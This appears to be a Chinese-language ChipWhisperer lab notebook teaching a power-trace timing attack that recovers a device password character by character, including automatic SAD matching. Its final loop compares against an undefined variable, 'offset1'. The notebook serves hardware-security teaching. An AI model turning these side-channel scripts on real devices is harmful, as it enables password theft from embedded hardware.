## 建立交流

* 因为程序在进行密码检查之后会进入死循环，我们需要一个重置函数来进行重启。

In [ ]:
import time
def reset_target(scope):
    if PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        scope.io.pdic = 'low'
        time.sleep(0.05)
        scope.io.pdic = 'high'
        time.sleep(0.05)
    else:  
        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.io.nrst = 'high'
        time.sleep(0.05)

## 时序分析

* 抓到能轨之后便可以开始进行攻击，我们先写一个单次运行的函数以供重复调用。

In [ ]:
def cap_pass_trace(pass_guess):
    ret = ""
    reset_target(scope)
    num_char = target.in_waiting()
    while num_char > 0:
        ret += target.read(num_char, 10)
        time.sleep(0.01)
        num_char = target.in_waiting()

    scope.arm()
    target.write(pass_guess)
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    trace = scope.get_last_trace()
    return trace

* 然后我们便可以尝试不同的密码并且查看其能轨的不同之处。

In [ ]:
%matplotlib notebook
import matplotlib.pylab as plt

trace_correct = cap_pass_trace("h0\n")
trace_wrong   = cap_pass_trace("h9\n")

plt.plot(trace_wrong, 'r')
plt.plot(trace_correct, 'g')
plt.show()

* 可以看见首部和尾部基本是相同的，同时如果仔细看能看到绿色的轨迹和红色的轨迹在时间上有所偏差。如果我们加密不同的消息则可以看到尖峰的位置在发生变化。我们可以查看当加密每一个字符时的轨迹。

* （Xenny）可以看出两个尖峰横坐标之间差了40左右。

In [ ]:
%matplotlib notebook
import matplotlib.pylab as plt

trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
for c in trylist:
    next_pass = c + "\n"
    trace = cap_pass_trace(next_pass)
    plt.plot(trace)

## 攻击单字符

* （Xenny）通过上面的能轨我们可以很明显的看到有两个尖峰

* 我们已经可以看到一个很明显的时间差异了，所以我们便可以开始构建攻击。

* 大致步骤为

    1. 猜测密码记录能轨
    2. 查看其尖峰位置

## 攻击全部密码

* 同理我们按照刚才观察得出的规律，对第$i$个字符判断不同的尖峰位置即可。所以我们只需要将攻击单字符的脚本循环其位置即可。

## 通过SAD匹配攻击

* 显然上述过程需要我们手动观察出能轨的不同，如果在不同的环境以及不同的代码中均有所不同，所以我们考虑一种自动化的思路。

* SAD(Sum of Absolute Difference)计算方法为

    $$
    \sum_{j=0}^{J}{|t_{ref,j}-t_{target,j}|}
    $$

    其中$t_{ref,j}$是参考轨迹，$t_{target,j}$是目标轨迹。


In [ ]:
def find_offset_SAD(ref, target_trace, threshold):
    def calc_SAD(a1, a2):
        SAD = 0
        for v1, v2 in zip(a1, a2):
            SAD += abs(v1 - v2)
        return SAD
    for offset in range(len(target_trace) - len(ref)):
        if calc_SAD(ref, target_trace[offset:offset+len(ref)]) < threshold:
            return offset


* 参考轨迹的要求有

    1. 它必须是唯一独特的，指选择的轨迹部分不应该和后续其他部分相同
    2. 它需要随时间变化。

    同时SAD匹配对于不同的错误密码，我们应该返回同样的参考轨迹，所以这给了我们一个机会去找到一个好的临界点，如果这个临界点太高了，则会很早便匹配，反之则匹配不到。

    下面便是一个例子对于所有字符进行匹配，如果偏移比参考轨迹要高，则说明它是一个正确的字符。

In [ ]:
original_offset = find_offset_SAD(ref, ref_trace, 5)
trylist = "abcdefghijklmnopqrstuvwxyz0123456789"
for c in trylist:
    next_pass = c + "\n"
    trace = cap_pass_trace(next_pass)
    offset = find_offset_SAD(ref, trace, 5)
    if offset is None:
        print("Threshold likely too low")
        break
    elif offset == 0:
        print("Threshold likely too high")
        break
    if offset > offset1:
        print(c)
        break

* （Xenny）其实这里的理论就是正确的密码会让程序多运行一些内容，那么我们的SAD匹配的偏移则会往后延，基于此，我们只要选择好了一个正确的匹配临界。便可以逐次遍历得到正确的密码。